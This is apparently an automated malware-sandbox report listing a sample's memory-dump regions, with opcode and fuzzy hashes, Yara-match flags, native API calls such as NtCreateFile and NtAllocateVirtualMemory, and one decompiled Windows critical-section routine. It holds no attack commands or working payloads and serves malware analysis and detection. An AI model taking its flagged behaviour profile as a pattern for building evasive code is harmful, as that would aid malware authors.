                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5923b48c25a2a0e64d47f486934e05bc9d7567bd26d66170c0310dbe2c9728e0
                                      • Instruction ID: 2a26b3cb7ca8ccaad3b736bbffb03a09c954caeb11dbaebf99ed5147989a4161
                                      • Opcode Fuzzy Hash: 5923b48c25a2a0e64d47f486934e05bc9d7567bd26d66170c0310dbe2c9728e0
                                      • Instruction Fuzzy Hash: D91148373022109BCB2A9A18CE81A6F739EEBC5630B284529DD1A87390DD359C06C6D4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9f29c91f2b0c301c84cba6aa4a2ce5f9797396e3ee50871a5dd1f8074e4bc6f6
                                      • Instruction ID: 609e0d457b93ce332a0b9aec09f9b320b9b1557d0186883c1f15dd9a0017f00a
                                      • Opcode Fuzzy Hash: 9f29c91f2b0c301c84cba6aa4a2ce5f9797396e3ee50871a5dd1f8074e4bc6f6
                                      • Instruction Fuzzy Hash: CA215771051602EFC726EF68CA40F5AB7F9FF68718F04456CE14D866A2CB38E941CB44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 512353c59474c37de45520b1af310ec70737c361d17f037730b2c26b253026c2
                                      • Instruction ID: 9511290590c0a9c19b03c06b312c62ade1234b3152710cea71503606a00a9ec7
                                      • Opcode Fuzzy Hash: 512353c59474c37de45520b1af310ec70737c361d17f037730b2c26b253026c2
                                      • Instruction Fuzzy Hash: 4F215C74602B01CFC726DF68E114A14BBF5FB8D354B5482AED2198B2A9DB39D492CF41
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 22efb08d752ba2bcb736e780c19d23cf9a48210d5d56d7e70c8b01f59f8758bd
                                      • Instruction ID: f222fbf560edbc4bbadfae12a8d7db60b229a778254c6d90e824624a55def375
                                      • Opcode Fuzzy Hash: 22efb08d752ba2bcb736e780c19d23cf9a48210d5d56d7e70c8b01f59f8758bd
                                      • Instruction Fuzzy Hash: 8E11087260430167E730A72D9C84F15B7DDBBA0A11F54442AFA0EA7151D9B8E84987D4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                      • Instruction ID: d1ed270a46b560bbd887dd061e7818a9d8d2ce01de24e559a46c4d6abc9929d7
                                      • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                      • Instruction Fuzzy Hash: 7F11E572504208BBCB059F5CD9808BEB7B9EFD5314F10806EF948C7351DA318D55D7A4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 61f47086409351e2063fc9e314a59cd92998f4466646520ec21bf6f475811309
                                      • Instruction ID: fcde43478c4c53b60508fd1942a0c82784aa6a125bab020ac66f4769e768e6e3
                                      • Opcode Fuzzy Hash: 61f47086409351e2063fc9e314a59cd92998f4466646520ec21bf6f475811309
                                      • Instruction Fuzzy Hash: 6A11E532724606ABC715AFADDC8996B77E9FBC4624B01052CE94983751DF20EC21C7E2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 59d9a4069a789ed12ea39e0cfe8d19913e77b6267698d1ded9cb4491499de9af
                                      • Instruction ID: ca6ff3e309b80aef30f8df88991051b74997690c163850d6a9523c2df85435dd
                                      • Opcode Fuzzy Hash: 59d9a4069a789ed12ea39e0cfe8d19913e77b6267698d1ded9cb4491499de9af
                                      • Instruction Fuzzy Hash: 13012672A016119BC337CB1D9B80E6ABBAAFFC1B51715806DE90D8B211CB30CA01C7C3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                      • Instruction ID: 843ed428180e487472a4ebf5797c54930dfcf45a1e777503dbc3a5ad1c3f73cd
                                      • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                      • Instruction Fuzzy Hash: 441104326016918FEB238B6CC948B393BDDAF81755F0D04A0ED0CCBA93E728D841C6A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                      • Instruction ID: a59058a7f8d947512dff27268ee71773d02631401a78f15250d0c5b6a3c94cbe
                                      • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                      • Instruction Fuzzy Hash: 9501847270111AABD725EE9ECD41E5B7FADFB846A4B380524BA0CCB250DA31DD0187A1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0675c94de1fce9281d076f6bd11fa1bf00ed3088b9aedbed61d6a0a2d8b3d617
                                      • Instruction ID: 33cc4009a7c16044af37d108668fdd44f9e8fd431c942463947b1e2029a54292
                                      • Opcode Fuzzy Hash: 0675c94de1fce9281d076f6bd11fa1bf00ed3088b9aedbed61d6a0a2d8b3d617
                                      • Instruction Fuzzy Hash: C501AF72A116049FD32A9F18D840B16BBADFF85B39F254166E5099B7A2C374DC41CBD0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                      • Instruction ID: 8e3d516c597b53273e0a709a166a2773d3e0b983e4bf0d582b14193cd565d3c8
                                      • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                      • Instruction Fuzzy Hash: AC019671190506BFE715AF69CDC4EA2FB6DFF95364F014525F218425A0CB62ACA0CAA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 49cdea14fa2e787ebdceeafc14f9bdac7b1d504d7e6610e6c848035d0e898430
                                      • Instruction ID: 46abbb7538d4e41881cfb0356fb303e1416bbcec172b53fb4370cf839f7802b7
                                      • Opcode Fuzzy Hash: 49cdea14fa2e787ebdceeafc14f9bdac7b1d504d7e6610e6c848035d0e898430
                                      • Instruction Fuzzy Hash: 7F014F72241A467FD755AB6DCD80E17BBACFFD9760B000629B50C97A11DB28EC11CAE4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362227114.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                      • Instruction ID: 67a74c04e29ff4e61b09d987b7ce808655dbaeefaf3697436ec920146cdb10b4
                                      • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                      • Instruction Fuzzy Hash: F4D0A9318011819AEB02AF1CC22CB683BB6BB00209FD83065808E06852E33A4B0EC680
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                      • Instruction ID: 645ee7b6dcb00de8dc57ecd8368db9a3239a1b928738a5f4f43990ab03136813
                                      • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                      • Instruction Fuzzy Hash: 5EC08C70280A01AAEB221F24CE01B103BA4BF50B06F8800A06305DA0F0DB78D802E600
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                      • Instruction ID: 7afe51ce085cb3cb6345a4b72b88b06f8b41abcff7d343f9a982f07b82a61939
                                      • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                      • Instruction Fuzzy Hash: 51C01232080248BBCB126E85CC00F067B2AEBA4B60F008014BA080A5608632E9B0EA84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                      • Instruction ID: 06e1e9dcd581bd4793739da8621bb27cf7447fcb99acbe8df1e1f7c6221a2608
                                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                      • Instruction Fuzzy Hash: C1C04C72180648BBCB126E45DD01F157B69E7A4B60F154021B6084B5618576ED61D598
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                      • Instruction ID: 9c7a102a2500f1f7fbff81d7598f0ca219b81e19b4e48b7bc99e8a758eae511d
                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                      • Instruction Fuzzy Hash: C7C08C32080248BBCB126A89CD00F057B29E7A0B60F000020B6080A6618932E860D988
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                      • Instruction ID: 4d4fbda9bb709689d7e79502fd4c75541d9d983dc8538fa8b89d126e10a6d7bb
                                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                      • Instruction Fuzzy Hash: 6EC02BB0150440FBDB161F34CE01F147258F740A26FB403547224864F0D5289C00D140
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                      • Instruction ID: 26bb6b3cd30eae38b0805ae74e556d4b4b811a945de0181624954db40626e9ee
                                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                      • Instruction Fuzzy Hash: 89C08C721551805AEF2E678CCE20B243A58AB0860EF68099CAA09094A2C368A802C608
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                      • Instruction ID: a08f0831db6037d542ca00fca96d5fc89127c060a0f425463b6bab8b116fab89
                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                      • Instruction Fuzzy Hash: CEB092353119408FCF1ADF1CC080B1533E8BB44A40B8400D0E404CBA21D229E8009900
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                      • Instruction ID: 8eb8fa9690be0c8be80da1e8845c8e29f9159d43390d12b41a7a421f9fb7d33f
                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                      • Instruction Fuzzy Hash: DAB01232C10441CFCF02FF40CA20B197331FB40750F054490900227930C228AC01CB40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 53%
                                      			E01A0FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                      				void* _t7;
                                      				intOrPtr _t9;
                                      				intOrPtr _t10;
                                      				intOrPtr* _t12;
                                      				intOrPtr* _t13;
                                      				intOrPtr _t14;
                                      				intOrPtr* _t15;
                                      
                                      				_t13 = __edx;
                                      				_push(_a4);
                                      				_t14 =  *[fs:0x18];
                                      				_t15 = _t12;
                                      				_t7 = E019BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                      				_push(_t13);
                                      				E01A05720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                      				_t9 =  *_t15;
                                      				if(_t9 == 0xffffffff) {
                                      					_t10 = 0;
                                      				} else {
                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                      				}
                                      				_push(_t10);
                                      				_push(_t15);
                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                      				return E01A05720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                      			}











                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A0FDFA
                                      Strings
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A0FE01
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A0FE2B
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: 070f1dfb2dbbbaed48c9d93afb91c867d38997e4ce22f87a45c60b3de058f919
                                      • Instruction ID: 7d0d3f57398c37363dbd0cf46a19789256f524571c1e242210248bc793849d66
                                      • Opcode Fuzzy Hash: 070f1dfb2dbbbaed48c9d93afb91c867d38997e4ce22f87a45c60b3de058f919
                                      • Instruction Fuzzy Hash: CDF0F672600201BFEA211B55ED06F23BF6AEB84B30F140314F628565D1DA62FC2096F0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Executed Functions

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00364B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00364B87,007A002E,00000000,00000060,00000000,00000000), ref: 00369DAD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 97a584bf2f05d31048d147a0b2589ffddc14c088bcb75b2fa52647235a9a1a48
                                      • Instruction ID: acd34092a79f6a0815e61578239e0f8c90806d50e5ef5e5d6d75296ce45b8c8a
                                      • Opcode Fuzzy Hash: 97a584bf2f05d31048d147a0b2589ffddc14c088bcb75b2fa52647235a9a1a48
                                      • Instruction Fuzzy Hash: E301A8B2200108AFDB04CF98DC85EDB77A9EF8C754F158248FA0DD7240D630E811CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00364B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00364B87,007A002E,00000000,00000060,00000000,00000000), ref: 00369DAD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction ID: 4b8464be7760e66db170ffe9e3b64c26632ae198db77c04f3ae49164f005a1d1
                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                      • Instruction Fuzzy Hash: 82F0B6B2200108ABCB08CF88DC85DEB77EDAF8C754F158248BA0D97241C630E8118BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00364B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00364B87,007A002E,00000000,00000060,00000000,00000000), ref: 00369DAD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID: .z`
                                      • API String ID: 823142352-1441809116
                                      • Opcode ID: e4a45a0148bfff756c8a5383a238794a8f00c363e748108148ed18c5256569a3
                                      • Instruction ID: 2ab5576ed931d5df2842ba12957b3a0ac71a95a256cd731c8d59bd32ffabee4f
                                      • Opcode Fuzzy Hash: e4a45a0148bfff756c8a5383a238794a8f00c363e748108148ed18c5256569a3
                                      • Instruction Fuzzy Hash: E0E012B3304908AB8B08CF98EC95DEB73ADEFCC210B00861DFA19C7200C631E8118BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtClose.NTDLL( M6,?,?,00364D20,00000000,FFFFFFFF), ref: 00369EB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID: M6
                                      • API String ID: 3535843008-1298217763
                                      • Opcode ID: 5968319f11dc53bb5869aa269df621ee45a92c3c5676f3609cba4dd2b88c62e0
                                      • Instruction ID: 894f1749607fba50d2613d3816d21eac7b75f42dfe632ef4fc0a67d12623d2d2
                                      • Opcode Fuzzy Hash: 5968319f11dc53bb5869aa269df621ee45a92c3c5676f3609cba4dd2b88c62e0
                                      • Instruction Fuzzy Hash: E8E0C2312405086BE710DFA4CC84EE77B99EF48351F118659F90CEB282C630E9008A90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtClose.NTDLL( M6,?,?,00364D20,00000000,FFFFFFFF), ref: 00369EB5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: Close
                                      • String ID: M6
                                      • API String ID: 3535843008-1298217763
                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction ID: ea4199559e7c903f8605ba8592f24d46effb8ce6c0fa9811d710b50d5e506a69
                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                      • Instruction Fuzzy Hash: A2D012752002186BD710EB98CC85E97779CEF44750F158455BA586B242C530F51086E0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00352D11,00002000,00003000,00000004), ref: 00369F79
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: e2687890f02f8406ba2493de24c9ec431ec66bb2d791c4403511851454ca64cb
                                      • Instruction ID: 123ed151c4e6add12712950a19a83b24f383b7444fab7fa8fda9036ff203a8b0
                                      • Opcode Fuzzy Hash: e2687890f02f8406ba2493de24c9ec431ec66bb2d791c4403511851454ca64cb
                                      • Instruction Fuzzy Hash: FF011AB5200209AFDB14DF98DC81DAB73ADEF88710F118519FE0897241C630E820CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,00364A01,?,?,?,?,00364A01,FFFFFFFF,?,BM6,?,00000000), ref: 00369E55
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 8186451b5bad31741b9d3260ab9961abe979ddf5b0eb9e6e9b814f12b883559a
                                      • Instruction ID: c1530e18412666385acd86cc124141bc565a458ce28b74365c90a88aa722fc35
                                      • Opcode Fuzzy Hash: 8186451b5bad31741b9d3260ab9961abe979ddf5b0eb9e6e9b814f12b883559a
                                      • Instruction Fuzzy Hash: 23F0F9B2210108AFCB18DF98CC80DEB77A9EF8C754F118258BE1DA7245C630E811CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtReadFile.NTDLL(?,?,FFFFFFFF,00364A01,?,?,?,?,00364A01,FFFFFFFF,?,BM6,?,00000000), ref: 00369E55
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction ID: ee433bf596fc48bed4f7a7d33ce62590b3fc7a22189d214d9bb13e387634107e
                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                      • Instruction Fuzzy Hash: 84F0A4B2200208ABDB14DF89DC81EEB77ADEF8C754F158248BA1DA7241D630E8118BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00352D11,00002000,00003000,00000004), ref: 00369F79
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.467643096.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateMemoryVirtual
                                      • String ID:
                                      • API String ID: 2167126740-0
                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction ID: 0ae160f09e8315d0003ff3a3940742436edc3f1e104bd49ea4c76d5fdf42e8ec
                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                      • Instruction Fuzzy Hash: 7DF015B2200208ABDB14DF89CC81EAB77ADEF88750F118148BE08A7241C630F810CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 7086a7d0137b33900c69d61dcb87808eae0585ee0bdebb4af4bb439d50319dcf
                                      • Instruction ID: 0fce5c09812caac4675363f96ccf2ec172a9980f1292668d3a2f5928e6fea9bb
                                      • Opcode Fuzzy Hash: 7086a7d0137b33900c69d61dcb87808eae0585ee0bdebb4af4bb439d50319dcf
                                      • Instruction Fuzzy Hash: 8A90026121184443D244A9695D14B470015D7D4343F51C129E0145554CCB5598616561
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 9d1a4355f74a93a93a77bfc4970afd9ecdc905e6d9cf880231ad592a0c5540cd
                                      • Instruction ID: 42a361c86c8a1886d5941211dbcf298f0de9ccb91f9ec5137c3c7818cb1ab262
                                      • Opcode Fuzzy Hash: 9d1a4355f74a93a93a77bfc4970afd9ecdc905e6d9cf880231ad592a0c5540cd
                                      • Instruction Fuzzy Hash: C19002B120104803D184B55955047860015D7D4341F51C025E5055554EC7999DD576A5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID:
                                      • API String ID: 2994545307-0
                                      • Opcode ID: 824cb3a0cca2bb4701360febbb5f650e3ada344e726b8b855a5d5168b8914ec5
                                      • Instruction ID: f4afdcb2baab09b15543a5e104bd3e67a4f74fc0e22fde81bb9368ee7b244abc
                                      • Opcode Fuzzy Hash: 824cb3a0cca2bb4701360febbb5f650e3ada344e726b8b855a5d5168b8914ec5
                                      • Instruction Fuzzy Hash: E09002A134104843D144A5595514B460015D7E5341F51C029E1055554DC759DC527166
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000017.00000002.471494428.0000000003140000.00000040.00000001.sdmp, Offset: 03140000, based on PE: true
                                      • Associated: 00000017.00000002.472301546.000000000325B000.00000040.00000001.sdmp
                                      • Associated: 00000017.00000002.472329011.000000000325F000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: InitializeThunk
